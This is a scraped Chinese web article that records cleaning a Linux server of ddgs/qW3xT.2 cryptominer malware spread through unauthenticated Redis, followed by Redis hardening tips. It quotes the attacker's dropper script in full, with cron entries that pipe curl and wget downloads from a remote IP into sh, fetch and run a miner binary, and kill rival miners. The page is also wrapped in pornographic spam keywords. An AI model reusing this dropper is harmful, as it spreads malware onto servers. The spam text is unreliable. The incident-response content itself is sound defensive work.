婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

熱門標簽:昆明外呼系統 臨汾電銷機器人費用 地圖標注需要提交啥資料入駐 400電話申請找哪家公司 七大洲地圖標注 地圖標注w是什么方向 河南省鄭州市地圖標注 福州呼叫中心外呼系統哪家好 新鄉人工智能電話機器人加盟

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。

本文主要介紹的是關于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說了,來一起看看詳細的介紹吧

被入侵后的現象:

發現有qW3xT.2與ddgs兩個異常進程,消耗了較高的cpu,kill掉后 過一會就會重新出現。

kill 掉這兩個異常進程后,過一段時間看到了如下進程:

首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本,輸入crontab -e 在其中找到了該定時任務

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國,i.sh 腳本內容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設置的免密登錄內容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379 配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

2.配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網      

入侵方式:

收集了相關資料,了解到其是利用redis漏洞,未設置密碼或密碼太簡單,導致的被入侵。具體方式可以參考

https://www.jb51.net/article/147375.htm

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##獲取當前密碼
config set requirepass "yourpassword" ##設置當前密碼,服務重新啟動后又會置為默認,即無密碼;

永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

標簽:岳陽 股票 四川 海口 鎮江 烏海 臨沂 紅河

巨人網絡通訊聲明:本文標題《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》,本文關鍵詞  linux,服務器,被,植入,ddgs,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》相關的同類信息!
  • 本頁收集關于linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美精品xxxxbbbb| 久久只精品国产| 亚洲免费在线播放| 国产成人福利片| 一本大道综合伊人精品热热| 国产精品欧美久久久久无广告| 久久精品免费在线观看| 精品乱人伦小说| 欧美喷水一区二区| 亚洲欧美色图小说| 日韩欧美专区在线| 久久你懂得1024| 国产精品系列在线播放| 91社区在线播放| 天涯成人国产亚洲精品一区av| 欧美一区二区私人影院日本| 韩国三级在线一区| ...中文天堂在线一区| 99在线精品一区二区三区| 紧缚奴在线一区二区三区| 欧美日本一区二区三区| 亚洲色图一区二区三区| 午夜欧美一区二区三区在线播放| 午夜久久久影院| 中文字幕第一区| 国产真实乱偷精品视频免| 91在线精品一区二区| 三级在线观看一区二区| 激情综合色播激情啊| 色综合久久天天综合网| 欧美妇女性影城| 国产精品国产三级国产三级人妇| 亚洲欧洲另类国产综合| 中文字幕中文字幕一区二区 | av中文字幕在线不卡| 国产乱一区二区| 久久精品一区蜜桃臀影院| 国产精品久久久久aaaa樱花| 麻豆精品一二三| 国产成人精品三级| 久久精品国产99国产| 有码一区二区三区| 午夜伦欧美伦电影理论片| 亚洲永久精品大片| 一区免费观看视频| 日韩视频在线一区二区| 蜜臀av一区二区在线免费观看| 久久久久九九视频| 欧美一级视频精品观看| 高清av一区二区| 日本欧洲一区二区| 污片在线观看一区二区| 亚洲综合丝袜美腿| 日韩精品一级二级 | 日韩欧美不卡在线观看视频| 久久99精品视频| 日韩欧美一区在线| 亚洲色图欧美激情| 亚洲国产一区二区视频| 玖玖九九国产精品| 一本色道久久加勒比精品 | av一二三不卡影片| 国产精品三级av| av电影一区二区| 国产亚洲精久久久久久| 玖玖九九国产精品| 国产日本一区二区| 久久精品国产网站| 欧美性大战久久久久久久蜜臀| 国产成人一级电影| 日韩—二三区免费观看av| 欧美三级在线看| 日本一区二区成人| gogogo免费视频观看亚洲一| 国产精品美女一区二区在线观看| 中文字幕一区二区三| 亚洲午夜av在线| 欧美日韩激情一区二区三区| 成人黄页毛片网站| 色综合视频一区二区三区高清| 亚洲丝袜精品丝袜在线| 久久伊人蜜桃av一区二区| 国模少妇一区二区三区| 日韩午夜小视频| 国产精品视频第一区| 欧美色涩在线第一页| 性做久久久久久免费观看| 狠狠色丁香久久婷婷综合_中| 在线观看欧美黄色| 91精品国产综合久久福利软件| 欧美男男青年gay1069videost | 午夜精品久久久久久久久久久| 日韩精品专区在线影院观看| 亚洲成人一区在线| av电影在线观看不卡| 久久精品国内一区二区三区| 亚洲成a人v欧美综合天堂 | 91久久精品一区二区二区| 日韩欧美www| 成人动漫一区二区在线| 国产精品一区久久久久| 国产永久精品大片wwwapp| 中文字幕免费观看一区| 久久 天天综合| 色爱区综合激月婷婷| 91精品国产综合久久香蕉麻豆| 国v精品久久久网| 久久久久99精品一区| 欧美精品高清视频| 99国产欧美另类久久久精品 | 国产精品视频在线看| 在线看不卡av| 最近中文字幕一区二区三区| 91精品在线免费观看| 成人免费看的视频| 无码av免费一区二区三区试看 | 国产成人在线色| 97久久精品人人爽人人爽蜜臀 | 亚洲国产精品精华液网站| 欧美日韩国产综合一区二区三区 | 欧美在线三级电影| 欧美日韩成人综合| 日韩在线a电影| 国产精品国产成人国产三级| 亚洲欧美另类在线| 一区二区三区日韩| 日本美女一区二区三区视频| 久久精品国产一区二区三| 国产精品亚洲专一区二区三区| 成人欧美一区二区三区在线播放| 日韩一区二区在线观看视频播放| 日韩精品三区四区| 亚洲地区一二三色| 精品亚洲porn| 婷婷久久综合九色国产成人| 国产在线一区二区| 国产亚洲精品免费| 免费成人性网站| 91精品国产综合久久婷婷香蕉| 亚洲色大成网站www久久九九| 亚洲一区二区三区四区中文字幕| 欧美日本一区二区三区| 成人性生交大片免费看视频在线 | 久久久久亚洲综合| 韩日av一区二区| 97精品国产露脸对白| 亚洲妇女屁股眼交7| 成人av网站免费观看| 精品一区二区三区视频| 91精品国产91久久久久久一区二区 | 一区二区三区小说| 色婷婷综合五月| 亚洲欧洲精品成人久久奇米网| 日本精品一区二区三区四区的功能| 欧美日韩亚洲综合在线 欧美亚洲特黄一级 | 亚洲无人区一区| 国产成人av一区| 国内成人免费视频| 色哦色哦哦色天天综合| 国产精品久久久久一区二区三区| 国产精品伊人色| 欧美大片免费久久精品三p | 精品精品国产高清a毛片牛牛| 偷偷要91色婷婷| 91婷婷韩国欧美一区二区| 久久精品亚洲精品国产欧美| 久久精品网站免费观看| 亚洲精品菠萝久久久久久久| 91精品国产福利在线观看| 欧美影院精品一区| 91久久久免费一区二区| 欧美日韩免费一区二区三区| 中文字幕巨乱亚洲| 亚洲第一搞黄网站| 成人久久18免费网站麻豆| 国产高清久久久| 国产精品高清亚洲| 亚洲一区二区3| 全部av―极品视觉盛宴亚洲| 色8久久人人97超碰香蕉987| 国产91丝袜在线观看| 国产精品一区二区在线看| 欧美高清视频不卡网| 欧美va天堂va视频va在线| 精品欧美乱码久久久久久| 综合在线观看色| 亚洲精品一区二区在线观看| 色天天综合久久久久综合片| 国产欧美视频在线观看| 视频一区视频二区中文字幕| 欧美不卡在线视频| 色欧美日韩亚洲| 视频一区欧美精品| 婷婷成人激情在线网| 欧美一级淫片007| 欧美精品一区二区在线播放| 日韩va亚洲va欧美va久久| 男女男精品视频| 激情综合色播激情啊| 美女诱惑一区二区|